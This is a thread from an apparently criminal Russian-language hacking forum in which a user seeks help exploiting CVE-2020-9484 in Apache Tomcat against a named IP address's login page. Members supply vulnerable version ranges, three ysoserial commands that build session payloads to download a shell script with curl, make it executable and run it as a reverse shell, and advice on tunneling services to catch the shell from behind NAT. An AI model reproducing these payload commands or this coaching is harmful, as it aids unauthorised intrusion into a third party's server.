• XSS.stack #1 – первый литературный журнал от юзеров форума

cve-2020-9484 / help

btcblackclub

RAID-массив
Забанен
Регистрация
03.06.2024
Сообщения
70
Реакции
8
Пожалуйста, обратите внимание, что пользователь заблокирован
приветствую всех, решил попробовать эксплуатировать уязвимость - cve 2020 9484
подскажите, присутствует ли он принципе на сайте https://117.158.227.74/login.jsp
если вы что то знаете/можете помочь - пишите мне в пм на форуме. в долгу не останусь.
на данный момент просто обучаюсь.
изображение_2024-07-05_152250669.png
 
Если что-то не получается, ты для начала попутайся получить баннер. Твоя цве для Apache Tomcat, следовательно тебе нужно получить баннер от него.

Если ты получил баннер и он попадает под условия:
Apache Tomcat 10.x до 10.0.0-M5
Apache Tomcat 9.x до 9.0.35
Apache Tomcat 8.x до 8.5.55
Apache Tomcat 7.x до 7.0.104

Но сплоит всёравно не пролазит, нужно смотреть сам запрос который твой чудо скрипт посылает и уже толкаться от этого
 
приветствую всех, решил попробовать эксплуатировать уязвимость - cve 2020 9484
подскажите, присутствует ли он принципе на сайте https://117.158.227.74/login.jsp
если вы что то знаете/можете помочь - пишите мне в пм на форуме. в долгу не останусь.
на данный момент просто обучаюсь.
Посмотреть вложение 88576

Предлагаю провести эксперимент: попробуйте у себя на VM поднять уязвимую тачку и проэксплуатировать для начала вот так "локально", дабы убедиться что эксплоит рабочий (ну или близко к тому).
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Если что-то не получается, ты для начала попутайся получить баннер. Твоя цве для Apache Tomcat, следовательно тебе нужно получить баннер от него.

Если ты получил баннер и он попадает под условия:
Apache Tomcat 10.x до 10.0.0-M5
Apache Tomcat 9.x до 9.0.35
Apache Tomcat 8.x до 8.5.55
Apache Tomcat 7.x до 7.0.104

Но сплоит всёравно не пролазит, нужно смотреть сам запрос который твой чудо скрипт посылает и уже толкаться от этого
Привет, баннер как раз так-и вылезает и показывает версию, в том смысл что при том же <script>alert(“ejehdbdbdb”)</script>, показывает версию apache tomcat, может я слишком глуп ещё.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Предлагаю провести эксперимент: попробуйте у себя на VM поднять уязвимую тачку и проэксплуатировать для начала вот так "локально", дабы убедиться что эксплоит рабочий (ну или близко к тому).
У меня вм’ка ебанутая с кали, ничего абсолютно не включает нормально, тот же бурп через раз работает с прокси
 
Пожалуйста, обратите внимание, что пользователь заблокирован
у тебя там пишет, что прав на создание файлов пейлода не хватает, а сам сплойт не останавливается и валит дальше в холостую
 
Пожалуйста, обратите внимание, что пользователь заблокирован
у тебя там пишет, что прав на создание файлов пейлода не хватает, а сам сплойт не останавливается и валит дальше в холостую
Странно, локальный хост на пайтоне открыл, неткет вроде порт слушает, остывшие зависимости для скрипта установлены. Самому скрипту выдал +x
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Если у кого получится, я могу дать сплойт, может там даже нету данной свешки т.к я вывел ее чисто из версии апача на сайте.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Проверь выполнение этих команд, создаются ли файлы
для downloadPayload.session
Код:
java -jar ysoserial-master.jar CommonsCollections2 'curl http://127.0.0.1/payload.sh -o /tmp/payload.sh' > downloadPayload.session

для chmodPayload.session
Код:
java -jar ysoserial-master.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session

для executePayload.session
Код:
java -jar ysoserial-master.jar CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Проверь выполнение этих команд, создаются ли файлы
для downloadPayload.session
Код:
java -jar ysoserial-master.jar CommonsCollections2 'curl http://127.0.0.1/payload.sh -o /tmp/payload.sh' > downloadPayload.session

для chmodPayload.session
Код:
java -jar ysoserial-master.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session

для executePayload.session
Код:
java -jar ysoserial-master.jar CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session
Спасибо, как понял просто должен создаться файл и все, возможно проблема в другом. Может у вас получится посмотреть по сайту что то?
 
У меня вм’ка ебанутая с кали, ничего абсолютно не включает нормально, тот же бурп через раз работает с прокси
Ну так сейчас компы дёшевы пц как, можно и не виртуалку даже. Это из серии как (известный факт) пацаны ломали игровые автоматы - купили такой и разобрались с ним, а потом готовые уже на настоящие пошли.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Спасибо, как понял просто должен создаться файл и все, возможно проблема в другом. Может у вас получится посмотреть по сайту что то?
Создается три файла, один для скачки пейлода (реверс шелл), второй для выставления ему прав, третий для запуска. Я бы хотел помочь практически, но нету под рукой сервера с выделенным айпи. Ну и таргет-хост нужен.
 
нету под рукой сервера с выделенным айпи
когда это кого-то останавливало то? ;-)
туннель надо просто бросить от "внутренней" тачки (хоть виртуалки) до одного из сервисов туннелей и на него "принимать входящие": https://github.com/anderspitman/awesome-tunneling
например https://jprq.io/ хороший вариант туннеля, я лично знаю одного из соавторов просто.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
когда это кого-то останавливало то? ;-)
туннель надо просто бросить от "внутренней" тачки (хоть виртуалки) до одного из сервисов туннелей и на него "принимать входящие": https://github.com/anderspitman/awesome-tunneling
например https://jprq.io/ хороший вариант туннеля, я лично знаю одного из соавторов просто
А смысл от туннеля? Как всегда просто кали настраиваю и все, всмысле мосты + pfSense. Всегда как-то так запускал. У меня почему то даже опенвпн не ставится нормально.
 
А смысл от туннеля? Как всегда просто кали настраиваю и все, всмысле мосты + pfSense. Всегда как-то так запускал. У меня почему то даже опенвпн не ставится нормально.
Ну вы же хотели коннект реверс-шелла извне, "но нету под рукой сервера с выделенным айпи", так?
При отсутствии своего IPv4 например двойной NAT у провайдера - туннель это единственный способ получить такой внешний IPv4, под "туннель" я понимаю любой коннект из-под NAT до "белого" IPv4 с целью редиректа входящих с него на комп за NAT. Ну так TCP/IPv4 устроен, что коннект может быть доступен только в одном направлении (от того кто за NAT до того у кого public IPv4), а вот данные инициировать отправку после коннекта может уже любая сторона ведь.
pfSense - это же файрвол вроде? Как он поможет коннекты принимать извне если ты за NAT (никак) ?
OpenVPN сейчас все провайдеры режут поди, у нас же давно "борьба с ветряными мельницами" :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну вы же хотели коннект реверс-шелла извне, "но нету под рукой сервера с выделенным айпи", так?
При отсутствии своего IPv4 например двойной NAT у провайдера - туннель это единственный способ получить такой внешний IPv4, под "туннель" я понимаю любой коннект из-под NAT до "белого" IPv4 с целью редиректа входящих с него на комп за NAT. Ну так TCP/IPv4 устроен, что коннект может быть доступен только в одном направлении (от того кто за NAT до того у кого public IPv4), а вот данные инициировать отправку после коннекта может уже любая сторона ведь.
pfSense - это же файрвол вроде? Как он поможет коннекты принимать извне если ты за NAT (никак) ?
OpenVPN сейчас все провайдеры режут поди, у нас же давно "борьба с ветряными мельницами" :)
Можем с тобой в телеграмме связаться? Хотел бы побольше обсудить данную тему, в будущем в долгу не останусь.
 
Можем с тобой в телеграмме связаться? Хотел бы побольше обсудить данную тему, в будущем в долгу не останусь.
Не использую телегу и никому не советую. IRC через Tor наше всё :cool:
А тут Jabber вроде бы был у сайта?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Не использую телегу и никому не советую. IRC через Tor наше всё :cool:
А тут Jabber вроде бы был у сайта?
джаббер есть но рега вроде пока закрыта для любого, админ вручную видел регает кому нужно, https://thesecure.at/ вот на главной висит
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Не использую телегу и никому не советую. IRC через Tor наше всё :cool:
А тут Jabber вроде бы был у сайта?
Дай жаббу, я тебе напишу.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх